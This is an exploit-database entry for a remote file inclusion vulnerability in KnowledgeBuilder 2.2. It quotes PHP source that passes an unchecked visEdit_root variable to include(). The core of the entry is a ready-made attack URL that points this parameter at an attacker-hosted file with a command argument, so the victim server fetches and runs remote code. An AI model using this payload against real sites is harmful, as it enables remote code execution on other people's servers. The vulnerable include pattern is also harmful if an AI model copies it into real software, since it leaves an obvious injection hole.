KnowledgeBuilder <= 2.2 (visEdit_root) Remote File Include Vulnerability

2006-09-13T00:00:00
ID 1337DAY-ID-830
Type zdt
Reporter igi
Modified 2006-09-13T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ========================================================================
KnowledgeBuilder <= 2.2 (visEdit_root) Remote File Include Vulnerability
========================================================================




+--------------------------------------------------------------------
+
+  KnowledgeBuilder.v2.2.PHP.NULL-WDYL  Remote File Inclusion
+
+-------------------------------------------------------------------
+
+ Version ...........: KnowledgeBuilder.v2.2.PHP.NULL-WDYL
+ Class .............: Remote File Inclusion
+ Found by ..........: igi
+
+--------------------------------------------------------------------
+--------------------------------------------------------------------

+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
<?php
// ================================================
// Main control class
// ================================================

include $visEdit_root.'config/visEdit_control.config.php';
include $visEdit_root.'class/toolbars.class.php';
include $visEdit_root.'class/lang.class.php';
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

----------------------------------------------------------------------------
------
http://www.victom.com/admin/e_data/visEdit_control.class.php?visEdit_root=http://yourevil.com/r0x.dat.txt?cmd
----------------------------------------------------------------------------
--------



#  0day.today [2018-04-05]  #